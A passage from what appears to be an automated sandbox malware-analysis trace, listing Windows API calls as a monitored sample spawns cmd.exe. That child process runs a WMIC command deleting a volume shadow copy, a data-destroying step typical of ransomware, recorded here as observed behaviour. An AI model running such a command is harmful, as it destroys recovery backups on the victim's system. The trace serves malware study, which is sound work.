(_Block=0x26c700) [0101.499] free (_Block=0x268240) [0101.499] free (_Block=0x26c5a0) [0101.499] free (_Block=0x26c5c0) [0101.499] free (_Block=0x268100) [0101.500] free (_Block=0x26c620) [0101.500] free (_Block=0x26c640) [0101.500] free (_Block=0x268180) [0101.500] free (_Block=0x26c660) [0101.500] free (_Block=0x26c680) [0101.500] free (_Block=0x2681c0) [0101.500] free (_Block=0x26c720) [0101.500] free (_Block=0x26c740) [0101.500] free (_Block=0x268280) [0101.500] CoUninitialize () [0101.516] exit (_Code=0) [0101.516] free (_Block=0x26cd30) [0101.516] free (_Block=0x267ea0) [0101.516] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0101.516] free (_Block=0x266f40) [0101.516] free (_Block=0x266a40) [0101.516] free (_Block=0x267e60) [0101.516] free (_Block=0x267e20) [0101.516] free (_Block=0x267dd0) [0101.516] free (_Block=0x267d90) [0101.516] free (_Block=0x267d30) [0101.516] free (_Block=0x265a90) [0101.516] free (_Block=0x265a50) [0101.516] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0101.516] free (_Block=0x26cec0) Thread: id = 166 os_tid = 0xabc Thread: id = 167 os_tid = 0xb00 Thread: id = 168 os_tid = 0xa6c Thread: id = 169 os_tid = 0xac8 Thread: id = 170 os_tid = 0xab4 Process: id = "26" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0xb7fe000" os_pid = "0xa20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 171 os_tid = 0xb40 [0101.617] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f770 | out: lpSystemTimeAsFileTime=0x22f770*(dwLowDateTime=0x442760d0, dwHighDateTime=0x1d68245)) [0101.617] GetCurrentProcessId () returned 0xa20 [0101.617] GetCurrentThreadId () returned 0xb40 [0101.617] GetTickCount () returned 0x114f1a0 [0101.617] QueryPerformanceCounter (in: lpPerformanceCount=0x22f778 | out: lpPerformanceCount=0x22f778*=22151027971) returned 1 [0101.620] GetModuleHandleW (lpModuleName=0x0) returned 0x4a980000 [0101.620] __set_app_type (_Type=0x1) [0101.620] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9a7810) returned 0x0 [0101.620] __getmainargs (in: _Argc=0x4a9ca608, _Argv=0x4a9ca618, _Env=0x4a9ca610, _DoWildCard=0, _StartInfo=0x4a9ae0f4 | out: _Argc=0x4a9ca608, _Argv=0x4a9ca618, _Env=0x4a9ca610) returned 0 [0101.621] GetCurrentThreadId () returned 0xb40 [0101.621] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb40) returned 0x3c [0101.621] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0101.621] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0101.621] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0101.621] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0101.621] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f708 | out: phkResult=0x22f708*=0x0) returned 0x2 [0101.622] VirtualQuery (in: lpAddress=0x22f6f0, lpBuffer=0x22f670, dwLength=0x30 | out: lpBuffer=0x22f670*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0101.622] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f670, dwLength=0x30 | out: lpBuffer=0x22f670*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0101.622] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f670, dwLength=0x30 | out: lpBuffer=0x22f670*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0101.622] VirtualQuery (in: lpAddress=0x134000, lpBuffer=0x22f670, dwLength=0x30 | out: lpBuffer=0x22f670*(BaseAddress=0x134000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0101.622] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f670, dwLength=0x30 | out: lpBuffer=0x22f670*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0101.622] GetConsoleOutputCP () returned 0x1b5 [0101.622] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0101.622] SetConsoleCtrlHandler (HandlerRoutine=0x4a9a3184, Add=1) returned 1 [0101.622] _get_osfhandle (_FileHandle=1) returned 0x7 [0101.623] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0101.623] _get_osfhandle (_FileHandle=1) returned 0x7 [0101.623] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0101.623] _get_osfhandle (_FileHandle=1) returned 0x7 [0101.623] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0101.623] _get_osfhandle (_FileHandle=0) returned 0x3 [0101.623] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0101.624] _get_osfhandle (_FileHandle=0) returned 0x3 [0101.624] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0101.624] GetEnvironmentStringsW () returned 0x3f8b90* [0101.624] GetProcessHeap () returned 0x3e0000 [0101.624] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa7c) returned 0x3f9620 [0101.624] FreeEnvironmentStringsW (penv=0x3f8b90) returned 1 [0101.624] GetProcessHeap () returned 0x3e0000 [0101.624] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x8) returned 0x3f8a10 [0101.624] GetEnvironmentStringsW () returned 0x3f8b90* [0101.624] GetProcessHeap () returned 0x3e0000 [0101.624] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa7c) returned 0x3fa0b0 [0101.624] FreeEnvironmentStringsW (penv=0x3f8b90) returned 1 [0101.625] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e5c8 | out: phkResult=0x22e5c8*=0x44) returned 0x0 [0101.625] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e5c0, lpData=0x22e5e0, lpcbData=0x22e5c4*=0x1000 | out: lpType=0x22e5c0*=0x0, lpData=0x22e5e0*=0x18, lpcbData=0x22e5c4*=0x1000) returned 0x2 [0101.625] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e5c0, lpData=0x22e5e0, lpcbData=0x22e5c4*=0x1000 | out: lpType=0x22e5c0*=0x4, lpData=0x22e5e0*=0x1, lpcbData=0x22e5c4*=0x4) returned 0x0 [0101.625] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e5c0, lpData=0x22e5e0, lpcbData=0x22e5c4*=0x1000 | out: lpType=0x22e5c0*=0x0, lpData=0x22e5e0*=0x1, lpcbData=0x22e5c4*=0x1000) returned 0x2 [0101.625] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e5c0, lpData=0x22e5e0, lpcbData=0x22e5c4*=0x1000 | out: lpType=0x22e5c0*=0x4, lpData=0x22e5e0*=0x0, lpcbData=0x22e5c4*=0x4) returned 0x0 [0101.625] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e5c0, lpData=0x22e5e0, lpcbData=0x22e5c4*=0x1000 | out: lpType=0x22e5c0*=0x4, lpData=0x22e5e0*=0x40, lpcbData=0x22e5c4*=0x4) returned 0x0 [0101.625] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e5c0, lpData=0x22e5e0, lpcbData=0x22e5c4*=0x1000 | out: lpType=0x22e5c0*=0x4, lpData=0x22e5e0*=0x40, lpcbData=0x22e5c4*=0x4) returned 0x0 [0101.625] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e5c0, lpData=0x22e5e0, lpcbData=0x22e5c4*=0x1000 | out: lpType=0x22e5c0*=0x0, lpData=0x22e5e0*=0x40, lpcbData=0x22e5c4*=0x1000) returned 0x2 [0101.625] RegCloseKey (hKey=0x44) returned 0x0 [0101.625] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e5c8 | out: phkResult=0x22e5c8*=0x44) returned 0x0 [0101.625] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e5c0, lpData=0x22e5e0, lpcbData=0x22e5c4*=0x1000 | out: lpType=0x22e5c0*=0x0, lpData=0x22e5e0*=0x40, lpcbData=0x22e5c4*=0x1000) returned 0x2 [0101.625] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e5c0, lpData=0x22e5e0, lpcbData=0x22e5c4*=0x1000 | out: lpType=0x22e5c0*=0x4, lpData=0x22e5e0*=0x1, lpcbData=0x22e5c4*=0x4) returned 0x0 [0101.625] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e5c0, lpData=0x22e5e0, lpcbData=0x22e5c4*=0x1000 | out: lpType=0x22e5c0*=0x0, lpData=0x22e5e0*=0x1, lpcbData=0x22e5c4*=0x1000) returned 0x2 [0101.625] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e5c0, lpData=0x22e5e0, lpcbData=0x22e5c4*=0x1000 | out: lpType=0x22e5c0*=0x4, lpData=0x22e5e0*=0x0, lpcbData=0x22e5c4*=0x4) returned 0x0 [0101.625] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e5c0, lpData=0x22e5e0, lpcbData=0x22e5c4*=0x1000 | out: lpType=0x22e5c0*=0x4, lpData=0x22e5e0*=0x9, lpcbData=0x22e5c4*=0x4) returned 0x0 [0101.626] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e5c0, lpData=0x22e5e0, lpcbData=0x22e5c4*=0x1000 | out: lpType=0x22e5c0*=0x4, lpData=0x22e5e0*=0x9, lpcbData=0x22e5c4*=0x4) returned 0x0 [0101.626] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e5c0, lpData=0x22e5e0, lpcbData=0x22e5c4*=0x1000 | out: lpType=0x22e5c0*=0x0, lpData=0x22e5e0*=0x9, lpcbData=0x22e5c4*=0x1000) returned 0x2 [0101.626] RegCloseKey (hKey=0x44) returned 0x0 [0101.626] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51744a [0101.626] srand (_Seed=0x5f51744a) [0101.626] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete" [0101.626] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete" [0101.626] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0101.626] GetProcessHeap () returned 0x3e0000 [0101.626] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x218) returned 0x3fab40 [0101.626] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3fab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0101.626] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9af360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0101.627] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9af360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0101.627] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9af360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0101.627] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0101.627] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0101.627] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0101.627] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0101.627] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0101.627] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0101.627] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0101.627] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0101.627] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0101.627] GetProcessHeap () returned 0x3e0000 [0101.627] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9620 | out: hHeap=0x3e0000) returned 1 [0101.627] GetEnvironmentStringsW () returned 0x3f8b90* [0101.627] GetProcessHeap () returned 0x3e0000 [0101.627] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa94) returned 0x3fad60 [0101.627] FreeEnvironmentStringsW (penv=0x3f8b90) returned 1 [0101.627] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9af360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0101.627] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9af360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0101.627] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0101.628] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0101.628] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0101.628] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0101.628] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0101.628] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0101.628] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0101.628] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0101.628] GetProcessHeap () returned 0x3e0000 [0101.628] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x5c) returned 0x3fb800 [0101.628] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f3d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0101.628] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x22f3d0, lpFilePart=0x22f3b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22f3b0*="Desktop") returned 0x25 [0101.628] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0101.628] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f0e0 | out: lpFindFileData=0x22f0e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x3fb870 [0101.628] FindClose (in: hFindFile=0x3fb870 | out: hFindFile=0x3fb870) returned 1 [0101.629] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x22f0e0 | out: lpFindFileData=0x22f0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3fb870 [0101.629] FindClose (in: hFindFile=0x3fb870 | out: hFindFile=0x3fb870) returned 1 [0101.629] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0101.629] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x22f0e0 | out: lpFindFileData=0x22f0e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x3fb870 [0101.629] FindClose (in: hFindFile=0x3fb870 | out: hFindFile=0x3fb870) returned 1 [0101.629] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0101.629] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0101.629] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0101.629] GetProcessHeap () returned 0x3e0000 [0101.629] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fad60 | out: hHeap=0x3e0000) returned 1 [0101.629] GetEnvironmentStringsW () returned 0x3fb870* [0101.629] GetProcessHeap () returned 0x3e0000 [0101.629] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xae8) returned 0x3fc360 [0101.629] FreeEnvironmentStringsW (penv=0x3fb870) returned 1 [0101.629] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0101.630] GetProcessHeap () returned 0x3e0000 [0101.630] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb800 | out: hHeap=0x3e0000) returned 1 [0101.630] GetProcessHeap () returned 0x3e0000 [0101.630] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4016) returned 0x3fce50 [0101.630] GetProcessHeap () returned 0x3e0000 [0101.630] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe4) returned 0x3f9680 [0101.630] GetProcessHeap () returned 0x3e0000 [0101.630] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fce50 | out: hHeap=0x3e0000) returned 1 [0101.630] GetConsoleOutputCP () returned 0x1b5 [0101.630] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0101.630] GetUserDefaultLCID () returned 0x409 [0101.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9b7b50, cchData=8 | out: lpLCData=":") returned 2 [0101.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f4e0, cchData=128 | out: lpLCData="0") returned 2 [0101.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f4e0, cchData=128 | out: lpLCData="0") returned 2 [0101.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f4e0, cchData=128 | out: lpLCData="1") returned 2 [0101.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9ca740, cchData=8 | out: lpLCData="/") returned 2 [0101.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9ca4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0101.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9ca460, cchData=32 | out: lpLCData="Tue") returned 4 [0101.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9ca420, cchData=32 | out: lpLCData="Wed") returned 4 [0101.632] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9ca3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0101.632] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9ca3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0101.632] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9ca360, cchData=32 | out: lpLCData="Sat") returned 4 [0101.632] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9ca700, cchData=32 | out: lpLCData="Sun") returned 4 [0101.632] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9b7b40, cchData=8 | out: lpLCData=".") returned 2 [0101.632] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9ca4e0, cchData=8 | out: lpLCData=",") returned 2 [0101.632] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0101.633] GetProcessHeap () returned 0x3e0000 [0101.633] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x20c) returned 0x3f97e0 [0101.633] GetConsoleTitleW (in: lpConsoleTitle=0x3f97e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0101.633] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0101.633] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0101.633] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0101.633] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0101.633] GetProcessHeap () returned 0x3e0000 [0101.633] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4012) returned 0x3fce50 [0101.634] GetProcessHeap () returned 0x3e0000 [0101.634] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fce50 | out: hHeap=0x3e0000) returned 1 [0101.636] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0101.636] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0101.636] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0101.637] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0101.637] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0101.637] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0101.637] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0101.637] GetProcessHeap () returned 0x3e0000 [0101.637] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0) returned 0x3f9a00 [0101.637] GetProcessHeap () returned 0x3e0000 [0101.637] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x54) returned 0x3f9ac0 [0101.640] GetProcessHeap () returned 0x3e0000 [0101.640] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x9e) returned 0x3f9b20 [0101.640] GetConsoleTitleW (in: lpConsoleTitle=0x22f3f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0101.641] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.641] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.641] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22ef80, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22ef60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22ef60*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0101.641] GetProcessHeap () returned 0x3e0000 [0101.641] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x218) returned 0x3f9bd0 [0101.641] GetProcessHeap () returned 0x3e0000 [0101.641] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe2) returned 0x3f9df0 [0101.641] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0101.641] GetProcessHeap () returned 0x3e0000 [0101.642] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x420) returned 0x3e1320 [0101.642] SetErrorMode (uMode=0x0) returned 0x8001 [0101.642] SetErrorMode (uMode=0x1) returned 0x0 [0101.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x3e1330, lpFilePart=0x22ec80 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x22ec80*="wbem") returned 0x18 [0101.642] SetErrorMode (uMode=0x8001) returned 0x1 [0101.642] GetProcessHeap () returned 0x3e0000 [0101.642] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3e1320, Size=0x54) returned 0x3e1320 [0101.642] GetProcessHeap () returned 0x3e0000 [0101.642] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3e1320) returned 0x54 [0101.642] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0101.642] GetProcessHeap () returned 0x3e0000 [0101.642] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x48) returned 0x3f9ee0 [0101.642] GetProcessHeap () returned 0x3e0000 [0101.642] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x7c) returned 0x3f9f30 [0101.642] GetProcessHeap () returned 0x3e0000 [0101.642] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f9f30, Size=0x48) returned 0x3f9f30 [0101.642] GetProcessHeap () returned 0x3e0000 [0101.643] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f9f30) returned 0x48 [0101.643] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9af360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 